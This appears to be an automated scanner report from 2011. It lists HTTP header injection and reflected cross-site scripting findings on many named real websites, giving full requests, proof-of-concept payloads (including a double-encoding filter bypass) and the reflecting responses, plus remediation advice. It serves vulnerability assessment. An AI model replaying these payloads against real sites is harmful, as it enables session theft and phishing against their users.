Severity:	High
Confidence:	Certain
Host:	http://www.phonejobsathome.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 66f74%0d%0a9c0a7fccf8a was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /66f74%0d%0a9c0a7fccf8a HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.phonejobsathome.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/5.0
Date: Wed, 04 May 2011 00:54:11 GMT
Location: /66f74
9c0a7fccf8a/

4.5. http://www.ptworkingathome.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ptworkingathome.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 2c4f7%0d%0a5a8fd3dab70 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /2c4f7%0d%0a5a8fd3dab70 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ptworkingathome.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/5.0
Date: Wed, 04 May 2011 03:41:54 GMT
Location: /2c4f7
5a8fd3dab70/

4.6. http://www.resumagic.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resumagic.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 84774%0d%0aff21d83b861 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /84774%0d%0aff21d83b861 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.resumagic.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/5.0
Date: Wed, 04 May 2011 01:49:39 GMT
Location: /84774
ff21d83b861/

4.7. http://www.solarmovie.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.solarmovie.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 97496%0d%0a811b37d5ad4 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /97496%0d%0a811b37d5ad4 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.solarmovie.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 301 Moved Permanently
Server: nginx/1.0.1
Date: Wed, 04 May 2011 03:47:19 GMT
Content-Type: text/html
Content-Length: 184
Location: http://www.solarmovie.com/97496
811b37d5ad4/
Connection: keep-alive

<html>
<head><title>301 Moved Permanently</title></head>
<body bgcolor="white">
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx/1.0.1</center>
</body>
</html>

5. Cross-site scripting (reflected) previous next
There are 31 instances of this issue:

http://pixel.fetchback.com/serve/fb/pdc [name parameter]
https://tickets.spac.org/TheatreManager/1/login [e parameter]
http://www.augsburgfortress.org/favicon.ico [REST URL parameter 1]
http://www.dailyadvance.com/favicon.ico [REST URL parameter 1]
http://www.egroupnet.com/favicon.ico [name of an arbitrarily supplied request parameter]
http://www.everydaysource.com/favicon.ico [name of an arbitrarily supplied request parameter]
http://www.game-spotting.com/favicon.ico [REST URL parameter 1]
http://www.hummingbirdmoth.com/favicon.ico [name of an arbitrarily supplied request parameter]
http://www.kiewit.com/favicon.ico [name of an arbitrarily supplied request parameter]
http://www.michaeljfox.org/favicon.ico [REST URL parameter 1]
http://www.mycentraloregon.com/favicon.ico [REST URL parameter 1]
http://www.myfacebooksmileys.com/favicon.ico [name of an arbitrarily supplied request parameter]
http://www.ntv.ru/favicon.ico [REST URL parameter 1]
http://www.oldiestelevision.com/favicon.ico [name of an arbitrarily supplied request parameter]
http://www.paint.net/favicon.ico [name of an arbitrarily supplied request parameter]
http://www.peoplesgas.com/favicon.ico [name of an arbitrarily supplied request parameter]
http://www.reverendfun.com/favicon.ico [REST URL parameter 1]
http://www.rockymounttelegram.com/favicon.ico [REST URL parameter 1]
http://www.everydentist.com/favicon.ico [Referer HTTP header]
http://www.idxcentral.com/favicon.ico [Referer HTTP header]
http://www.wardsci.com/favicon.ico [Referer HTTP header]
http://www.ammessages6.com/favicon.ico [REST URL parameter 1]
http://www.ammessages6.com/favicon.ico [name of an arbitrarily supplied request parameter]
http://www.dbfx.net/favicon.ico [REST URL parameter 1]
http://www.dbfx.net/favicon.ico [name of an arbitrarily supplied request parameter]
http://www.herbdoc.com/favicon.ico [REST URL parameter 1]
http://www.herbdoc.com/favicon.ico [name of an arbitrarily supplied request parameter]
http://www.mannatech.com/favicon.ico [REST URL parameter 1]
http://www.mannatech.com/favicon.ico [name of an arbitrarily supplied request parameter]
http://www.rachelray.com/favicon.ico [REST URL parameter 1]
http://www.rachelray.com/favicon.ico [name of an arbitrarily supplied request parameter]

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

5.1. http://pixel.fetchback.com/serve/fb/pdc [name parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pixel.fetchback.com
Path:	/serve/fb/pdc

Issue detail

The value of the name request parameter is copied into the HTML document as plain text between tags. The payload 7d439<x%20style%3dx%3aexpression(alert(1))>44f729db3c5 was submitted in the name parameter. This input was echoed as 7d439<x style=x:expression(alert(1))>44f729db3c5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /serve/fb/pdc?cat=&name=landing7d439<x%20style%3dx%3aexpression(alert(1))>44f729db3c5&sid=2988 HTTP/1.1
Host: pixel.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.beam.to/favicon.ico?1'=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmp=1_1304360759_4895:253215_15758:334759_12704:334759_10164:617491_10638:617491_10640:617491_10641:617491_1437:617491_1660:1181087; sit=1_1304360759_3801:420:0_1714:284953:253215_3306:512579:334759_719:618318:617491_2451:669187:664087_3236:827150:827032_782:1181436:1181087; bpd=1_1304360759_1ZCU5:29L4; apd=1_1304360759; afl=1_1304360759; cre=1_1304360971_29802:59536:1:0_29805:59534:1:661; uid=1_1304360971_1303179323923:6792170478871670; kwd=1_1304360971_11317:617703_11717:617703_11718:617703_11719:617703; scg=1_1304360971; ppd=1_1304360971

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:32:55 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cmp=1_1304472775_4895:365231_15758:446775_12704:446775_10164:729507_10638:729507_10640:729507_10641:729507_1437:729507_1660:1293103; Domain=.fetchback.com; Expires=Mon, 02-May-2016 01:32:55 GMT; Path=/
Set-Cookie: uid=1_1304472775_1303179323923:6792170478871670; Domain=.fetchback.com; Expires=Mon, 02-May-2016 01:32:55 GMT; Path=/
Set-Cookie: kwd=1_1304472775_11317:729507_11717:729507_11718:729507_11719:729507; Domain=.fetchback.com; Expires=Mon, 02-May-2016 01:32:55 GMT; Path=/
Set-Cookie: sit=1_1304472775_3801:112436:112016_1714:396969:365231_3306:624595:446775_719:730334:729507_2451:781203:776103_3236:939166:939048_782:1293452:1293103; Domain=.fetchback.com; Expires=Mon, 02-May-2016 01:32:55 GMT; Path=/
Set-Cookie: cre=1_1304472775_29802:59536:1:111804_29805:59534:1:112465; Domain=.fetchback.com; Expires=Mon, 02-May-2016 01:32:55 GMT; Path=/
Set-Cookie: bpd=1_1304472775_1ZCU5:2cTm; Domain=.fetchback.com; Expires=Mon, 02-May-2016 01:32:55 GMT; Path=/
Set-Cookie: apd=1_1304472775; Domain=.fetchback.com; Expires=Mon, 02-May-2016 01:32:55 GMT; Path=/
Set-Cookie: scg=1_1304472775; Domain=.fetchback.com; Expires=Mon, 02-May-2016 01:32:55 GMT; Path=/
Set-Cookie: ppd=1_1304472775; Domain=.fetchback.com; Expires=Mon, 02-May-2016 01:32:55 GMT; Path=/
Set-Cookie: afl=1_1304472775; Domain=.fetchback.com; Expires=Mon, 02-May-2016 01:32:55 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Wed, 04 May 2011 01:32:55 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91

5.2. https://tickets.spac.org/TheatreManager/1/login [e parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://tickets.spac.org
Path:	/TheatreManager/1/login

Issue detail

The value of the e request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35a57"><script>alert(1)</script>6cd95a334ae23ba04 was submitted in the e parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /TheatreManager/1/login?e=35a57"><script>alert(1)</script>6cd95a334ae23ba04&p=&btnPasswordRequest=Forgot+My+Password&C_SEQ=0&param= HTTP/1.1
Host: tickets.spac.org
Connection: keep-alive
Referer: https://tickets.spac.org/TheatreManager/1/online?btnAccount=Account
Cache-Control: max-age=0
Origin: https://tickets.spac.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=109962183.1304490783.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; __utma=109962183.2070296370.1304490783.1304490783.1304490783.1; __utmc=109962183; __utmb=109962183.1.10.1304490783; __utmz=109962183.1304490783.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; __utma=109962183.2070296370.1304490783.1304490783.1304490783.1; __utmc=109962183; __utmb=109962183.1.10.1304490783; TM7OnlineSales1=ec5e0f501d208f821c7dfdb9f3010d55a8b3693f99bc5300cda607d30b587b5d9ebc418ed2a6d0a7

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:48:15 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7l DAV/2
Expires: Thu, 01 Jan 1995 01:00:00 GMT
Pragma: no-cache
Content-type: text/html; charset=utf-8
Content-length: 6001
Set-Cookie: __utmz=109962183.1304490783.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; domain=tickets.spac.org; path=/; expires=Thu, 5-MAY-2011 06:48:18 GMT;
Set-Cookie: __utma=109962183.2070296370.1304490783.1304490783.1304490783.1; domain=tickets.spac.org; path=/; expires=Thu, 5-MAY-2011 06:48:18 GMT;
Set-Cookie: __utmc=109962183; domain=tickets.spac.org; path=/; expires=Thu, 5-MAY-2011 06:48:18 GMT;
Set-Cookie: __utmb=109962183.1.10.1304490783; domain=tickets.spac.org; path=/; expires=Thu, 5-MAY-2011 06:48:18 GMT;
Set-Cookie: TM7OnlineSales1=ec5e0f501d208f826f1c94f774d0273c4d4fd000ae29761ecda607d30b587b5de86e13659c1e35c8; domain=tickets.spac.org; path=/; expires=Thu, 5-MAY-2011 06:48:18 GMT;

<HTML><HEAD> <base href="https://tickets.spac.org/1/WebPagesEN/"><TITLE>Login</TITLE> <link rel="stylesheet" href="tmGifs/styleButtons.css" type="text/css"> <link rel="stylesheet" href="
...[SNIP]...
<INPUT NAME=e TYPE=text VALUE="35a57"><script>alert(1)</script>6cd95a334ae23ba04" SIZE=30>
...[SNIP]...

5.3. http://www.augsburgfortress.org/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.augsburgfortress.org
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6c6a0<script>alert(1)</script>939cc2887d2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico6c6a0<script>alert(1)</script>939cc2887d2 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.augsburgfortress.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=36FB6801A0A488DAFFC8918DDF5D1A1B; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Pragma: No-cache
Cache-Control: no-cache
Content-Type: text/html
Date: Wed, 04 May 2011 01:19:53 GMT
Content-Length: 29234

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" >

<head>

<title>Augsbu
...[SNIP]...
<strong>/favicon.ico6c6a0<script>alert(1)</script>939cc2887d2</strong>
...[SNIP]...

5.4. http://www.dailyadvance.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.dailyadvance.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a0d1"><script>alert(1)</script>75640254913 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico8a0d1"><script>alert(1)</script>75640254913 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.dailyadvance.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Wed, 04 May 2011 01:44:47 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Keep-Alive: timeout=60
Vary: Accept-Encoding
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.9
Set-Cookie: SESS50cc53af8ee153ed39c03e00285c25d5=257efe0b46c4e99c733dc3df491cb62c; expires=Fri, 27-May-2011 05:15:26 GMT; path=/; domain=.dailyadvance.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 04 May 2011 01:42:06 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Length: 15789

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
...[SNIP]...
<A href="/user/login?destination=favicon.ico8a0d1"><script>alert(1)</script>75640254913">
...[SNIP]...

5.5. http://www.egroupnet.com/favicon.ico [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.egroupnet.com
Path:	/favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 40681<script>alert(1)</script>61b8752915a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?40681<script>alert(1)</script>61b8752915a=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.egroupnet.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:41:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 1699
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCCCASDDC=MPODCDDALNNBOKJALCNHDPCH; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; cha
...[SNIP]...
</TABLE>
/favicon.ico?40681<script>alert(1)</script>61b8752915a=1
</BODY>
...[SNIP]...

5.6. http://www.everydaysource.com/favicon.ico [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.everydaysource.com
Path:	/favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99fcd"style%3d"x%3aexpression(alert(1))"59ac161962c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 99fcd"style="x:expression(alert(1))"59ac161962c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /favicon.ico?99fcd"style%3d"x%3aexpression(alert(1))"59ac161962c=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.everydaysource.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 88946
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ARRAffinity=7a672d3d079939118ecdd9d64f1f94342ac1ca2739378769d69296f3b3545e50;Path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:56:42 GMT

<!DOCTYPE html>
<html xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.com/2008/fbml">
<head>

<title>Page not found | EverydaySource.com®</title>
<script
...[SNIP]...
<a href="https://www.everydaysource.com/member/signin?reply=http://www.everydaysource.com/favicon.ico?99fcd"style="x:expression(alert(1))"59ac161962c=1">
...[SNIP]...

5.7. http://www.game-spotting.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.game-spotting.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 529ec<script>alert(1)</script>d474888bd18 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico529ec<script>alert(1)</script>d474888bd18 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.game-spotting.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.62
Date: Wed, 04 May 2011 02:33:49 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.11
Set-Cookie: PHPSESSID=80db2aef25725b17b57b77d65b9f8ded; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 317

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL /favicon.ico529ec<script>alert(1)</script>d474888bd18 was not found on this server.<P>
...[SNIP]...

5.8. http://www.hummingbirdmoth.com/favicon.ico [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.hummingbirdmoth.com
Path:	/favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 856bb"><script>alert(1)</script>4ca43521b82 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?856bb"><script>alert(1)</script>4ca43521b82=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hummingbirdmoth.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:11:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 871

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<title>Hummingbirdmoth.com </title>
<META name="description" content="So you th
...[SNIP]...
<frame src="http://173.83.194.219/page5.html/favicon.ico?856bb"><script>alert(1)</script>4ca43521b82=1" frameborder="0" />
...[SNIP]...

5.9. http://www.kiewit.com/favicon.ico [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.kiewit.com
Path:	/favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 765f9<script>alert(1)</script>04534598348 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?765f9<script>alert(1)</script>04534598348=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.kiewit.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:58:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 4486
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQSSTCSCB=IIBGNKEACDFAMKMJBMAHCNNG; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>Page Not Fou
...[SNIP]...
<strong>favicon.ico?765f9<script>alert(1)</script>04534598348=1</strong>
...[SNIP]...

5.10. http://www.michaeljfox.org/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.michaeljfox.org
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 390a2%253cscript%253ealert%25281%2529%253c%252fscript%253e8b973e2a87c was submitted in the REST URL parameter 1. This input was echoed as 390a2<script>alert(1)</script>8b973e2a87c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /390a2%253cscript%253ealert%25281%2529%253c%252fscript%253e8b973e2a87c HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.michaeljfox.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response (redirected)

HTTP/1.1 404 Not Found
Connection: close
Date: Wed, 04 May 2011 04:22:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=41484280;domain=.michaeljfox.org;expires=Fri, 26-Apr-2041 04:22:23 GMT;path=/
Set-Cookie: CFTOKEN=30677446;domain=.michaeljfox.org;expires=Fri, 26-Apr-2041 04:22:23 GMT;path=/
Set-Cookie: CFID=41484280;path=/
Set-Cookie: CFTOKEN=30677446;path=/
Set-Cookie: USERUUID=41484280%2D30677446%2D05%2D03%2D2011%2D21%2D22%2D23;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D41484280%26CFTOKEN%23%3D30677446%23lastvisit%3D%7Bts%20%272011%2D05%2D03%2021%3A22%3A23%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D03%2021%3A22%3A23%27%7D%23hitcount%3D2%23cftoken%3D30677446%23cfid%3D41484280%23;domain=.michaeljfox.org;expires=Fri, 26-Apr-2041 04:22:23 GMT;path=/
Content-Language: en-US
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
   <meta http-equiv="Con
...[SNIP]...
<p>

                   Sorry, the resource you requested is not found: (http://www.michaeljfox.org/390a2<script>alert(1)</script>8b973e2a87c)<br />
...[SNIP]...

5.11. http://www.mycentraloregon.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.mycentraloregon.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0d43"><script>alert(1)</script>f53c8f63bfa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icob0d43"><script>alert(1)</script>f53c8f63bfa HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mycentraloregon.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Wed, 04 May 2011 03:24:20 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Length: 45926

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
<meta http-equiv="Content-Type" content
...[SNIP]...
